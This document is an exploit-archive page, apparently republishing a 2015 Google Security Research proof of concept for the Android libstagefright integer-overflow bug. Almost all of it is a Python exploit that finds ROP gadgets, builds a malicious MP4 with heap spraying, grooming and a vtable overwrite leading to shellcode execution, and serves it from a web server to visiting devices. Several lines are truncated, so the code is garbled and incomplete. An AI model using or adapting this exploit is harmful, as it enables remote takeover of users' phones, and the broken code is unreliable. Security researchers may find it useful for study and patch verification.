Google Android – libstagefright Integer Overflow Remote Code Execution

  • 作者: Google Security Research
    日期: 2015-09-17
  • 类别:
  • 来源:
  • #!/usr/bin/python2
    import cherrypy
    import os
    import pwnlib.asm as asm
    import pwnlib.elf as elf
    import sys
    import struct
    with open('shellcode.bin', 'rb') as tmp:
    shellcode =
    while len(shellcode) % 4 != 0:
    shellcode += '\x00'
    # heap grooming configuration
    alloc_size = 0x20
    groom_count = 0x4
    spray_size = 0x100000
    spray_count = 0x10
    # address of the buffer we allocate for our shellcode
    mmap_address = 0x90000000
    # addresses that we need to predict
    libc_base = 0xb6ebd000
    spray_address = 0xb3000000
    # ROP gadget addresses
    stack_pivot = None
    pop_pc = None
    pop_r0_r1_r2_r3_pc = None
    pop_r4_r5_r6_r7_pc = None
    ldr_lr_bx_lr = None
    ldr_lr_bx_lr_stack_pad = 0
    mmap64 = None
    memcpy = None
    def find_arm_gadget(e, gadget):
    gadget_bytes = asm.asm(gadget, arch='arm')
    gadget_address = None
    for address in
    if address % 4 == 0:
    gadget_address = address
    if gadget_bytes ==, len(gadget_bytes)):
    print asm.disasm(gadget_bytes, vma=gadget_address, arch='arm')
    return gadget_address
    def find_thumb_gadget(e, gadget):
    gadget_bytes = asm.asm(gadget, arch='thumb')
    gadget_address = None
    for address in
    if address % 2 == 0:
    gadget_address = address + 1
    if gadget_bytes == - 1, len(gadget_bytes)):
    print asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb')
    return gadget_address
    def find_gadget(e, gadget):
    gadget_address = find_thumb_gadget(e, gadget)
    if gadget_address is not None:
    return gadget_address
    return find_arm_gadget(e, gadget)
    def find_rop_gadgets(path):
    global memcpy
    global mmap64
    global stack_pivot
    global pop_pc
    global pop_r0_r1_r2_r3_pc
    global pop_r4_r5_r6_r7_pc
    global ldr_lr_bx_lr
    global ldr_lr_bx_lr_stack_pad
    e = elf.ELF(path)
    e.address = libc_base
    memcpy = e.symbols['memcpy']
    print '[*] memcpy : 0x{:08x}'.format(memcpy)
    mmap64 = e.symbols['mmap64']
    print '[*] mmap64 : 0x{:08x}'.format(mmap64)
    # .text:00013344ADD R2, R0, #0x4C
    # .text:00013348LDMIA R2, {R4-LR}
    # .text:0001334CTEQ SP, #0
    # .text:00013350TEQNE LR, #0
    # .text:00013354BEQ botch_0
    # .text:00013358MOV R0, R1
    # .text:0001335CTEQ R0, #0
    # .text:00013360MOVEQ R0, #1
    # .text:00013364BXLR
    pivot_asm = ''
    pivot_asm += 'add r2, r0, #0x4c\n'
    pivot_asm += 'ldmia r2, {r4 - lr}\n'
    pivot_asm += 'teq sp, #0\n'
    pivot_asm += 'teqne lr, #0'
    stack_pivot = find_arm_gadget(e, pivot_asm)
    print '[*] stack_pivot : 0x{:08x}'.format(stack_pivot)
    pop_pc_asm = 'pop {pc}'
    pop_pc = find_gadget(e, pop_pc_asm)
    print '[*] pop_pc : 0x{:08x}'.format(pop_pc)
    pop_r0_r1_r2_r3_pc = find_gadget(e, 'pop {r0, r1, r2, r3, pc}')
    print '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'.format(pop_r0_r1_r2_r3_pc)
    pop_r4_r5_r6_r7_pc = find_gadget(e, 'pop {r4, r5, r6, r7, pc}')
    print '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'.format(pop_r4_r5_r6_r7_pc)
    ldr_lr_bx_lr_stack_pad = 0
    for i in range(0, 0x100, 4):
    ldr_lr_bx_lr_asm ='ldr lr, [sp, #0x{:08x}]\n'.format(i)
    ldr_lr_bx_lr_asm += 'add sp, sp, #0x{:08x}\n'.format(i + 8)
    ldr_lr_bx_lr_asm += 'bxlr'
    ldr_lr_bx_lr = find_gadget(e, ldr_lr_bx_lr_asm)
    if ldr_lr_bx_lr is not None:
    ldr_lr_bx_lr_stack_pad = i
    def pad(size):
    return '#' * size
    def pb32(val):
    return struct.pack(">I", val)
    def pb64(val):
    return struct.pack(">Q", val)
    def p32(val):
    return struct.pack("<I", val)
    def p64(val):
    return struct.pack("<Q", val)
    def chunk(tag, data, length=0):
    if length == 0:
    length = len(data) + 8
    if length > 0xffffffff:
    return pb32(1) + tag + pb64(length)+ data
    return pb32(length) + tag + data
    def alloc_avcc(size):
    avcc = 'A' * size
    return chunk('avcC', avcc)
    def alloc_hvcc(size):
    hvcc = 'H' * size
    return chunk('hvcC', hvcc)
    def sample_table(data):
    stbl = ''
    stbl += chunk('stco', '\x00' * 8)
    stbl += chunk('stsc', '\x00' * 8)
    stbl += chunk('stsz', '\x00' * 12)
    stbl += chunk('stts', '\x00' * 8)
    stbl += data
    return chunk('stbl', stbl)
    def memory_leak(size):
    pssh = 'leak'
    pssh += 'L' * 16
    pssh += pb32(size)
    pssh += 'L' * size
    return chunk('pssh', pssh)
    def heap_spray(size):
    pssh = 'spry'
    pssh += 'S' * 16
    pssh += pb32(size)
    page = ''
    nop = asm.asm('nop', arch='thumb')
    while len(page) < 0x100:
    page += nop
    page += shellcode
    while len(page) < 0xed0:
    page += '\xcc'
    # MPEG4DataSource fake vtable
    page += p32(stack_pivot)
    # pivot swaps stack then returns to pop {pc}
    page += p32(pop_r0_r1_r2_r3_pc)
    # mmap64(mmap_address, 
    page += p32(mmap_address) # r0 = address
    page += p32(0x1000) # r1 = size
    page += p32(7)# r2 = protection
    page += p32(0x32) # r3 = flags
    page += p32(ldr_lr_bx_lr) # pc
    page += pad(ldr_lr_bx_lr_stack_pad)
    page += p32(pop_r4_r5_r6_r7_pc) # lr
    page += pad(4)
    page += p32(0x44444444) # r4
    page += p32(0x55555555) # r5
    page += p32(0x66666666) # r6
    page += p32(0x77777777) # r7
    page += p32(mmap64) # pc
    page += p32(0xffffffff) # fd(and then r4)
    page += pad(4)# padding (and then r5)
    page += p64(0)# offset(and then r6, r7)
    page += p32(pop_r0_r1_r2_r3_pc) # pc
    # memcpy(shellcode_address, 
    #spray_address + len(rop_stack),
    page += p32(mmap_address) # r0 = dst
    page += p32(spray_address - 0xed0)# r1 = src
    page += p32(0xed0)# r2 = size
    page += p32(0x33333333) # r3
    page += p32(ldr_lr_bx_lr) # pc
    page += pad(ldr_lr_bx_lr_stack_pad)
    page += p32(pop_r4_r5_r6_r7_pc) # lr
    page += pad(4)
    page += p32(0x44444444) # r4
    page += p32(0x55555555) # r5
    page += p32(0x66666666) # r6
    page += p32(0x77777777) # r7
    page += p32(memcpy) # pc
    page += p32(0x44444444) # r4
    page += p32(0x55555555) # r5
    page += p32(0x66666666) # r6
    page += p32(0x77777777) # r7
    page += p32(mmap_address + 1) # pc
    while len(page) < 0x1000:
    page += '#'
    pssh += page * (size // 0x1000)
    return chunk('pssh', pssh)
    def exploit_mp4():
    ftyp = chunk("ftyp","69736f6d0000000169736f6d".decode("hex"))
    trak = ''
    # heap spray so we have somewhere to land our corrupted vtable 
    # pointer
    # yes, we wrap this in a sample_table for a reason; the 
    # NuCachedSource we will be using otherwise triggers calls to mmap,
    # leaving our large allocations non-contiguous and making our chance
    # of failure pretty high. wrapping in a sample_table means that we
    # wrap the NuCachedSource with an MPEG4Source, making a single 
    # allocation that caches all the data, doubling our heap spray 
    # effectiveness :-)
    trak += sample_table(heap_spray(spray_size) * spray_count)
    # heap groom for our MPEG4DataSource corruption
    # get the default size allocations for our MetaData::typed_data 
    # groom allocations out of the way first, by allocating small blocks
    # instead.
    trak += alloc_avcc(8)
    trak += alloc_hvcc(8)
    # we allocate the initial tx3g chunk here; we'll use the integer 
    # overflow so that the allocated buffer later is smaller than the 
    # original size of this chunk, then overflow all of the following 
    # MPEG4DataSource object and the following pssh allocation; hence why
    # we will need the extra groom allocation (so we don't overwrite 
    # anything sensitive...)
    # | tx3g | MPEG4DataSource | pssh |
    overflow = 'A' * 24
    # | tx3g ----------------> | pssh |
    overflow += p32(spray_address) # MPEG4DataSource vtable ptr
    overflow += '0' * 0x48
    overflow += '0000'# r4
    overflow += '0000'# r5
    overflow += '0000'# r6
    overflow += '0000'# r7
    overflow += '0000'# r8
    overflow += '0000'# r9
    overflow += '0000'# r10
    overflow += '0000'# r11
    overflow += '0000'# r12
    overflow += p32(spray_address + 0x20) # sp
    overflow += p32(pop_pc) # lr
    trak += chunk("tx3g", overflow)
    # defragment the for alloc_size blocks, then make our two
    # allocations. we end up with a spurious block in the middle, from
    # the temporary ABuffer deallocation.
    # | pssh | - | pssh |
    trak += memory_leak(alloc_size) * groom_count
    # | pssh | - | pssh | .... | avcC |
    trak += alloc_avcc(alloc_size)
    # | pssh | - | pssh | .... | avcC | hvcC |
    trak += alloc_hvcc(alloc_size)
    # | pssh | - | pssh | pssh | avcC | hvcC | pssh |
    trak += memory_leak(alloc_size) * 8
    # | pssh | - | pssh | pssh | avcC | .... |
    trak += alloc_hvcc(alloc_size * 2)
    # entering the stbl chunk triggers allocation of an MPEG4DataSource
    # object
    # | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh |
    stbl = ''
    # | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh |
    stbl += alloc_avcc(alloc_size * 2)
    # | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh |
    # | pssh | - | pssh | pssh | tx3g ----------------> |
    overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff)
    stbl += chunk("tx3g", '', length = overflow_length)
    trak += chunk('stbl', stbl)
    return ftyp + chunk('trak', trak)
    index_page = '''
    <!DOCTYPE html>
    window.setTimeout('location.reload(true);', 4000);
    <iframe src=''></iframe>
    class ExploitServer(object):
    exploit_file = None
    exploit_count = 0
    def index(self):
    self.exploit_count += 1
    print '*' * 80
    print 'exploit attempt: ' + str(self.exploit_count)
    print '*' * 80
    return index_page
    def exploit(self):
    cherrypy.response.headers['Content-Type'] = 'video/mp4'
    cherrypy.response.headers['Content-Encoding'] = 'gzip'
    if self.exploit_file is None:
    exploit_uncompressed = exploit_mp4()
    with open('exploit_uncompressed.mp4', 'wb') as tmp:
    os.system('gzip exploit_uncompressed.mp4')
    with open('exploit_uncompressed.mp4.gz', 'rb') as tmp:
    self.exploit_file =
    os.system('rm exploit_uncompressed.mp4.gz')
    return self.exploit_file
    def main():
    with open('exploit.mp4', 'wb') as tmp:
    if __name__ == '__main__':